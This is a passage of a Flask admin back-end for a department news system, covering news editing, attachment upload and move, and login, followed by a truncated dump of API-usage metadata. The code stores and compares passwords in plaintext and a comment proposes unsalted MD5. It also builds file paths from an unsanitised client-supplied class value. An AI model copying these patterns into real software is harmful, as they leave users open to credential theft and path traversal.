        else:

            print("[admin_newsfilelist]: {} is not exists.".format(os.path.join(currentPath, app.config['DOWNLOAD_FILEFOLDER'], read_item.get_FilePosition())))

    return render_template('newsfilelist.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'], RoleRank=session['RoleRank'],
                           is_Unable=is_Unable,
                           news_title=get_web_arg_news_Title,
                           news_NID=get_web_arg_news_NID,
                           news_Class=get_web_arg_news_Class,
                           list_NewsFile_all=list_NewsFile_all,
                           dplistClass=get_web_arg_dplistClass,
                           URL_admin_news=url_for('news', UID=session['UID'], DPID=session['DPID'], UserName=session['UserName'], dplistClass=get_web_arg_dplistClass),
                           list_URL=list_URL)
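# Caveat for the upload path above: werkzeug's secure_filename() drops every
# non-ASCII character, so purely Chinese file names collapse, e.g.
#
#   secure_filename('報告.pdf')  ->  'pdf'
#   secure_filename('成績.pdf')  ->  'pdf'
#
# i.e. two different attachments can end up with the same stored name and
# trip the duplicate check even though the originals differ.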
@app.route("/editnews", methods=['GET', 'POST'])
@login_required
def editnews():  # edit-news page

    bad_login = verify_login_status()
    if bad_login:
        return bad_login

    is_Unable = check_unable_page("editnews")

    # ------------------------------------- page parameters ----------------------------------------------------
    list_URL = initialize_URL()

    Http_Title = "後台修改公告"

    '''department record of the current session'''
    select_DP = DP.query.filter_by(DPID=session['DPID']).first()

    get_web_arg_edit_NID = request.args.get('NID')
    get_web_arg_dplistClass = request.args.get('dplistClass')

    select_News_result = News.query.filter_by(NID=get_web_arg_edit_NID).first()

    # ------------------------------------- AJAX handling ---------------------------------------------------
    if request.method == 'POST':

        data = request.get_json(force=True)

        get_js_NID = data['NID']                             # news id
        get_js_Class = data['Class']                         # news class
        get_js_Title = data['Title']                         # news title
        get_js_ckeditor_content = data['ckeditor_content']   # body HTML

        print("get_js_NID: {}".format(get_js_NID))
        print("get_js_Class: {}".format(get_js_Class))
        print("get_js_Title: {}".format(get_js_Title))
        print("get_js_ckeditor_content: {}".format(get_js_ckeditor_content))

        editnews_status = False
        log = ""

        # all four fields must be present in the posted JSON
        if (get_js_Class is not None and get_js_Title is not None) and (get_js_NID is not None and get_js_ckeditor_content is not None):

            update_News = News.query.filter_by(NID=get_js_NID).first()

            # update the title when it changed
            if update_News.get_title() != get_js_Title:
                update_News.title = get_js_Title

            # update the class when it changed
            if update_News.get_Class() != get_js_Class:
                update_News.Class = get_js_Class

            # attachments live under the class directory, so they must follow
            # the post into its new class
            update_newsfile = NewsFile.query.filter_by(NID=get_js_NID)

            # root directory for the (possibly new) class
            img_save_dir = os.path.join(app.config['UPLOAD_FILEFOLDER'], get_js_Class)

            if not os.path.isdir(img_save_dir):
                try:
                    os.makedirs(img_save_dir)
                except FileExistsError:  # created concurrently
                    print("[admin_editnews]: [ {} ]目錄已存在。".format(img_save_dir))

            if not os.path.isdir(os.path.join(img_save_dir, select_DP.get_DP())):
                try:
                    os.makedirs(os.path.join(img_save_dir, select_DP.get_DP()))
                except FileExistsError:
                    print("[admin_editnews]: [ {} ]目錄已存在。".format(os.path.join(img_save_dir, select_DP.get_DP())))

            for read_item in update_newsfile:

                # original attachment location
                old_FilePosition = read_item.FilePosition

                # keep only the file name; basename() instead of split('/')
                # so the code does not depend on the path separator
                new_FilePosition = os.path.join(get_js_Class, select_DP.get_DP(), os.path.basename(str(old_FilePosition)))

                # update the recorded location
                read_item.FilePosition = new_FilePosition

                # move the file itself to the new location
                shutil.move(os.path.join(currentPath, app.config['UPLOAD_FILEFOLDER'], old_FilePosition), os.path.join(currentPath, app.config['UPLOAD_FILEFOLDER'], new_FilePosition))

            # update the body when it changed
            if update_News.get_Content() != get_js_ckeditor_content:
                update_News.Content = get_js_ckeditor_content

            db.session.commit()

            # confirm the edit by re-querying with the new values; a non-zero
            # count means the record now matches what was submitted
            select_News_editresult = News.query.filter_by(NID=get_js_NID, Class=get_js_Class, title=get_js_Title, Content=get_js_ckeditor_content).count()

            if select_News_editresult != 0:
                editnews_status = True
                log = "公告修改完成."
            else:
                editnews_status = False
                log = "公告修改失敗."

        else:
            editnews_status = False
            log = "公告修改失敗."

        return jsonify(dict(redirect=url_for('news', UID=session['UID'], DPID=session['DPID'], UserName=session['UserName'], dplistClass=get_web_arg_dplistClass), editnews_status=editnews_status, log=log))

    return render_template('editnews.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'], RoleRank=session['RoleRank'],
                           is_Unable=is_Unable,
                           edit_NID=select_News_result.get_NID(), edit_class=select_News_result.get_Class(), edit_title=select_News_result.get_title(), edit_Content=select_News_result.get_Content(),
                           list_editnews_class=list_editnews_class,
                           URL_admin_news=url_for('news', UID=session['UID'], DPID=session['DPID'], UserName=session['UserName'], dplistClass=get_web_arg_dplistClass),
                           list_URL=list_URL,
                           dplistClass=get_web_arg_dplistClass
                           )
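# Attachment paths, as the views above and below maintain them (layout
# recovered from the os.path.join calls; the folder names themselves come
# from app.config):
#
#   <UPLOAD_FILEFOLDER>/<Class>/<DP abbreviation>/<filename>
#
# Changing a post's Class therefore moves every attachment one directory
# over, which is exactly what the shutil.move() loop in editnews() does.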
@app.route("/addnews", methods=['GET', 'POST'])
@login_required
def addnews():  # add-news page

    bad_login = verify_login_status()
    if bad_login:
        return bad_login

    is_Unable = check_unable_page("addnews")

    # ------------------------------------- page parameters ----------------------------------------------------
    list_URL = initialize_URL()

    Http_Title = "後台新增公告"

    '''department record of the current session'''
    select_DP = DP.query.filter_by(DPID=session['DPID']).first()

    # ------------------------------------- form handling ---------------------------------------------------
    if request.method == 'POST':

        err_log = ""

        form_Class = request.form.get('dropdownlist_Class')  # news class
        form_Title = request.form.get('Title')               # news title

        # https://stackoverflow.com/questions/7906085/getting-the-textarea-value-of-a-ckeditor-textarea-with-javascript
        form_ckeditor_content = request.form.get('ckeditor')  # news body
        form_is_Top = request.form.get('is_Top')              # pin flag

        # attachments selected in the form
        form_files = request.files.getlist("files[]")

        # the checkbox arrives as the string "true"/"false"
        form_is_Top = form_is_Top == "true"

        addnews_status = False

        # refuse to create an exact duplicate post
        select_new_exists = News.query.filter_by(
            DPID=session['DPID'], creater=session['UserName'], Class=form_Class, title=form_Title).count()

        if select_new_exists == 0:

            db.session.add(News(DPID=session['DPID'], creater=session['UserName'],
                                title=form_Title,
                                Class=form_Class,
                                Content=form_ckeditor_content,
                                Top=form_is_Top,
                                Createdate=get_current_datetime()))

            db.session.commit()

            # re-read the new post to obtain its NID for the attachments
            select_new_result = News.query.filter_by(DPID=session['DPID'], creater=session['UserName'], Class=form_Class, title=form_Title).first()

            if len(form_files) != 0:

                # root directory for this news class
                img_save_dir = os.path.join(app.config['UPLOAD_FILEFOLDER'], form_Class)

                if not os.path.isdir(img_save_dir):
                    try:
                        os.makedirs(img_save_dir)
                    except FileExistsError:  # created concurrently
                        print("[admin_addnews]: [ {} ]目錄已存在。".format(img_save_dir))

                # ... and the per-department subdirectory below it
                if not os.path.isdir(os.path.join(img_save_dir, select_DP.get_DP())):
                    try:
                        os.makedirs(os.path.join(img_save_dir, select_DP.get_DP()))
                    except FileExistsError:
                        print("[admin_addnews]: [ {} ]目錄已存在。".format(os.path.join(img_save_dir, select_DP.get_DP())))

                for read_file in form_files:

                    filename = secure_filename(read_file.filename)  # sanitise the name

                    file_path = os.path.join(img_save_dir, select_DP.get_DP(), filename)

                    read_file.save(file_path)

                    db.session.add(NewsFile(NID=select_new_result.get_NID(), File=filename, FilePosition=os.path.join(form_Class, select_DP.get_DP(), filename)))

                    db.session.commit()

            addnews_status = True

        else:
            addnews_status = False

        return redirect(list_URL['news'])

    return render_template('addnews.html', Http_Title=Http_Title, UID=session['UID'], UserName=session['UserName'],
                           is_Unable=is_Unable,
                           list_addnews_class=list_addnews_class,
                           list_URL=list_URL)
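# Note on the login flow below: the credential check is a direct
# filter_by(Account=..., Password=...) lookup, so passwords are compared
# exactly as stored. If hashed storage were introduced, the lookup would
# hash first -- a sketch with the names used in this file (the hashing step
# itself is an assumption, not current behaviour):
#
#   hashed_psw = hashlib.md5(str(data['psw']).encode('utf-8')).hexdigest()
#   User_Admin.query.filter_by(Account=data['account'], Password=hashed_psw)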
# ------------------------------------------- login management -------------------------------------------
@app.route("/login", methods=['GET', 'POST'])
def login():  # login page

    Http_Title = "後台管理系統登入"
    status = None

    if request.method == 'POST':

        data = request.get_json(force=True)
        status = data['status']

        if status == 'login':

            # does an account/password pair match a User row?
            check_result = User_Admin.query.filter_by(Account=data['account'], Password=data['psw']).count()

            if check_result != 0:  # at least one matching row

                ''' select_User_info() returns a list indexed as:
                    0 RID (role id)      4 ActivationStatus
                    1 UserName           5 Createdate
                    2 DPID               6 Password
                    3 Account
                '''
                result = User_Admin.query.filter_by(Account=data['account'], Password=data['psw']).first()

                # TypeError: Unicode-objects must be encoded before hashing -->
                # encode with str().encode('utf-8') before any hashlib call

                # the account must be active (ActivationStatus == True)
                if result.ActivationStatus:

                    login_user(result)  # registers session['user_id'] automatically

                    # department of the logged-in user
                    select_DP = DP.query.filter_by(DPID=result.get_DPID()).first()

                    session['UID'] = result.get_id()            # user id (UID)
                    session['DPID'] = result.get_DPID()
                    session['DP'] = select_DP.get_DP()
                    session['UserName'] = result.get_UserName()  # user name
                    logindate = get_current_datetime()

                    print("[login]: UID: {} , User: {} . 登入成功. {}".format(session['UID'], session['UserName'], logindate))

                    # reply with the redirect target and the verification flag,
                    # as JSON; the key is allow_redirect on every path
                    return jsonify(dict(redirect=url_for('admin', UID=session['UID'], UserName=session['UserName']), allow_redirect=True))

                else:

                    err_log = "該使用者[ UID: {} , {} ]帳號目前停止啟用中,請聯絡網站系統管理員處理!!".format(result.get_id(), result.get_UserName())

                    print("[login]: UID: {} , {} 登入失敗,帳號未啟用. {}".format(result.get_id(), result.get_UserName(), get_current_datetime()))

                    return jsonify(dict(allow_redirect=False, err_log=err_log))

            else:

                err_log = "帳號或密碼輸入錯誤!"

                print("[login]: 登入失敗. {}".format(get_current_datetime()))

                return jsonify(dict(allow_redirect=False, err_log=err_log))

    else:

        return render_template('login.html', Http_Title=Http_Title)


@app.route('/logout', methods=['GET'])
@login_required
def logout():  # log out

    print("[logout]: UID: {} , 部門: {} , 使用者: {} 登出系統. {}".format(session['UID'], session['DP'], session['UserName'], get_current_datetime()))

    logout_user()          # Flask-Login logout
    initialize_session()   # clear the session

    return redirect(url_for('login'))


@app.before_request
def before_request():
    g.user = current_user


# https://stackoverflow.com/questions/34795798/flask-sqlalchemy-user-query-basequery-object-has-no-attribute-password
@login_manager.user_loader
def load_user(id):  # look up the logged-in user by UID
    return User_Admin.query.filter_by(UID=id).first()


# Unauthenticated requests land here and are pointed back to the login page.
@login_manager.unauthorized_handler
def unauthorized():
    # The original response carried link markup that is not included in this
    # listing; only the message text survives.
    return "請重新進行登入. 點我返回登入頁面"
"flask.redirect", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 196, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 201, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 214, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 214, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 222, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 222, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 222, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 224, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 224, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 224, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 227, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 227, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 227, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 233, "usage_type": "call"}, {"api_name": "Model.News.query.filter_by", "line_number": 242, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 242, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 242, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 242, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 242, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 245, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 245, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 245, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 253, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 253, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 253, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 253, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 253, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 256, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 256, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 256, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 302, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 302, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 305, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 305, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 333, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 205, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 358, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 358, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 358, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 359, "usage_type": "call"}, {"api_name": 
"flask.request.args", "line_number": 359, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 359, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 367, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 367, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 367, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 369, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 369, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 369, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 372, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 372, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 372, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 378, "usage_type": "call"}, {"api_name": "Model.News.query.filter_by", "line_number": 387, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 387, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 387, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 387, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 387, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 390, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 390, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 390, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 398, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 398, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 398, "usage_type": "name"}, {"api_name": "Model.News.Createdate.desc", "line_number": 398, "usage_type": "call"}, {"api_name": "Model.News.Createdate", "line_number": 398, "usage_type": "attribute"}, {"api_name": "Model.News.query.filter_by", "line_number": 401, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 401, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 401, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 432, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 350, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 455, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 455, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 455, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 457, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 457, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 457, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 464, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 464, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 464, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 466, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 466, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 466, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 469, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 469, "usage_type": "attribute"}, {"api_name": "flask.request", 
"line_number": 469, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 475, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 498, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 498, "usage_type": "name"}, {"api_name": "flask.url_for", "line_number": 503, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 503, "usage_type": "call"}, {"api_name": "os.path", "line_number": 503, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 514, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 447, "usage_type": "name"}, {"api_name": "flask.send_from_directory", "line_number": 536, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 539, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 546, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 556, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 556, "usage_type": "name"}, {"api_name": "flask_ckeditor.upload_fail", "line_number": 568, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 571, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 571, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 576, "usage_type": "call"}, {"api_name": "os.path", "line_number": 576, "usage_type": "attribute"}, {"api_name": "flask.url_for", "line_number": 579, "usage_type": "call"}, {"api_name": "flask_ckeditor.upload_success", "line_number": 583, "usage_type": "call"}, {"api_name": "Model.User.query.filter_by", "line_number": 606, "usage_type": "call"}, {"api_name": "Model.User.query", "line_number": 606, "usage_type": "attribute"}, {"api_name": "Model.User", "line_number": 606, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 607, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 610, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 611, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 612, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 593, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 635, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 635, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 635, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 640, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 640, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 643, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 643, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 662, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 662, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 662, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 670, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 670, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 670, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 671, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 671, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 671, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 683, "usage_type": 
"call"}, {"api_name": "flask.url_for", "line_number": 683, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 683, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 694, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 694, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 694, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 700, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 700, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 700, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 709, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 709, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 709, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 722, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 722, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 722, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 741, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 741, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 751, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 751, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 751, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 753, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 753, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 753, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 766, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 766, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 766, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 787, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 787, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 798, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 798, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 798, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 801, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 801, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 801, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 804, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 804, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 805, "usage_type": "name"}, {"api_name": "Config.list_news_class", "line_number": 807, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 619, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 829, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 829, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 829, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 833, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 833, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 836, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 836, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 850, 
"usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 850, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 850, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 858, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 858, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 858, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 868, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 868, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 868, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 875, "usage_type": "call"}, {"api_name": "os.path", "line_number": 875, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 878, "usage_type": "call"}, {"api_name": "os.path", "line_number": 878, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 882, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 897, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 897, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 907, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 907, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 907, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 909, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 909, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 909, "usage_type": "name"}, {"api_name": "Model.News.query.filter_by", "line_number": 922, "usage_type": "call"}, {"api_name": "Model.News.query", "line_number": 922, "usage_type": "attribute"}, {"api_name": "Model.News", "line_number": 922, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 943, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 943, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 954, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 954, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 954, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 956, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 956, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 956, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 959, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 959, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 960, "usage_type": "name"}, {"api_name": "Config.list_news_storagemanage_class", "line_number": 962, "usage_type": "name"}, {"api_name": "flask_login.login_required", "line_number": 813, "usage_type": "name"}, {"api_name": "Model.Department.query.filter_by", "line_number": 984, "usage_type": "call"}, {"api_name": "Model.Department.query", "line_number": 984, "usage_type": "attribute"}, {"api_name": "Model.Department", "line_number": 984, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 984, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 987, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 987, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 987, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 988, "usage_type": "call"}, {"api_name": 
"flask.request.args", "line_number": 988, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 988, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 989, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 989, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 989, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 990, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 990, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 990, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 998, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 998, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 1001, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 1001, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1016, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1016, "usage_type": "name"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1019, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1019, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1019, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1022, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1022, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 1025, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1025, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 1028, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 1031, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1031, "usage_type": "attribute"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1040, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1040, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 1054, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 1054, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 1054, "usage_type": "name"}, {"api_name": "flask.request.files.getlist", "line_number": 1062, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 1062, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 1062, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 1072, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1072, "usage_type": "attribute"}, {"api_name": "werkzeug.utils.secure_filename", "line_number": 1084, "usage_type": "call"}, {"api_name": "Model.NewsFile.query.filter_by", "line_number": 1087, "usage_type": "call"}, {"api_name": "Model.NewsFile.query", "line_number": 1087, "usage_type": "attribute"}, {"api_name": "Model.NewsFile", "line_number": 1087, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 1112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1112, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 1116, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 1124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1124, "usage_type": "attribute"}, {"api_name": "os.path.join", 
